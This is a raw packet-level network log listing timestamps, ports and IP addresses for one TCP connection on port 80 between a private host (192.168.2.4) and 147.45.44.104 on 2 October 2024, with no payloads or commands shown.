Oct 2, 2024 09:41:05.156627893 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156660080 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156685114 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.156685114 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.156693935 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156727076 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156757116 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156780958 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.156812906 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156867027 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156888008 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.156900883 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156935930 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156969070 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.157000065 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.157000065 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.157001019 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.157033920 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.157067060 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.157100916 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.157115936 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.157115936 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.157135010 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.157166958 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.157200098 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.157231092 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.157258034 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.157258034 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.157267094 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.157300949 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.157334089 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.157366991 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.157382965 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.157382965 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.157401085 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.157433987 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.157468081 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.157488108 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.157501936 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.157521009 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.157535076 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.157567978 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.157601118 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.157634020 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.157665014 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.157665968 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.157666922 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.158031940 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.189946890 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.189970970 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.189986944 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.190002918 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.190020084 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.190036058 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.190053940 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.190064907 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.190064907 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.190234900 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.233922005 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.233944893 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.233953953 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.233961105 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.233969927 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.233977079 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.233994961 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.234388113 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.241749048 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.241794109 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.241852999 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.241888046 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.241921902 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.241956949 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.241982937 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.241983891 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.241988897 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.242027044 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.242640972 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.242691994 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.242727041 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.242743015 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.242743015 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.242764950 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.242800951 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.242834091 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.242872953 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.242883921 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.242883921 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.243257999 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.243292093 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.243345976 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.243381023 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.243396997 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.243396997 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.243469954 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.243524075 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.243557930 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.243591070 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.243626118 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.243678093 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.243710995 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.243710995 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.243711948 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.243748903 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.243782043 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.243818998 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.243834972 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.243834972 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.243854046 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.243908882 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.243942022 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.243973970 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244009018 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244041920 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244075060 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244076014 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.244076014 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.244110107 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244143009 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244177103 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244210958 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244242907 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244272947 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.244272947 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.244275093 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244328976 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244363070 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244395971 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244427919 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.244427919 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.244430065 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244483948 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244523048 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244554996 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244585991 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.244585991 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.244586945 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244616985 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244651079 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244703054 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244735956 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244738102 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.244738102 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.244771957 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244806051 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244858980 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244889975 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244890928 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.244890928 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.244925976 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.244959116 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245011091 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245042086 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.245043039 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.245064020 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245098114 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245130062 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245168924 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245201111 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.245201111 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.245201111 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245235920 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245268106 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245305061 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245337009 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.245337009 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245337009 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.245372057 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245404005 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245435953 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245465994 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245465994 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.245465994 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.245500088 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245533943 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245567083 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245598078 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.245598078 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.245599985 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245634079 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245666027 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245698929 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245709896 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.245743036 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245757103 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.245778084 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245811939 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245843887 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245862961 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.245862961 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.245879889 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245910883 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245944977 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.245976925 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.246010065 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.246042967 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.246074915 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.246074915 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.246074915 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.246110916 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.246144056 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.246176004 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.246206999 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.246206999 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.246211052 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.246243000 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.246275902 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.246309042 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.246340990 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.246340990 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.246612072 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.247404099 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.278760910 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.278810978 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.278826952 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.278842926 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.278861046 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.278877974 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.278894901 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.279021978 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.279366970 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.322647095 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.322669983 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.322685003 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.322700977 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.322719097 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.322746038 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.322762966 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.322922945 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.322922945 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.322922945 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.322922945 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.330502987 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.330527067 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.330543995 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.330560923 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.330579042 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.330595970 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.330602884 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.330602884 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.330614090 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.330957890 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.331140041 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331175089 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331192970 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331208944 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331226110 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331234932 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.331234932 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.331242085 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331269026 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331274033 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.331288099 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331305027 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331322908 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331403017 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.331412077 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331429005 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331444979 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331463099 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331490993 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.331490993 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.331509113 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331526995 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331542015 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331557989 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331573963 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331589937 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331605911 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331617117 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.331617117 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.331621885 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331688881 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.331752062 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331768990 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331783056 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331799030 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331815958 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331831932 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331846952 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331859112 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.331859112 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.331897020 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331912994 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331928015 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331945896 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.331957102 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.331957102 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.331964016 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332070112 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332086086 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332101107 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332115889 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332129955 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.332129955 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.332133055 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332149982 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332165003 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332176924 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.332176924 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.332180977 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332199097 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332212925 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332228899 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332257032 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.332257032 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.332281113 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332298994 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332314014 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332329035 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332345963 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332356930 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.332356930 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.332416058 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332432985 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332448959 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332465887 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332477093 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.332477093 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.332483053 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332530975 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.332634926 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332652092 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332667112 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332683086 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332699060 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332711935 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.332711935 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.332715034 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332731962 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332747936 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332762957 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332775116 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.332775116 CEST	49734	80	192.168.2.4	147.45.44.104
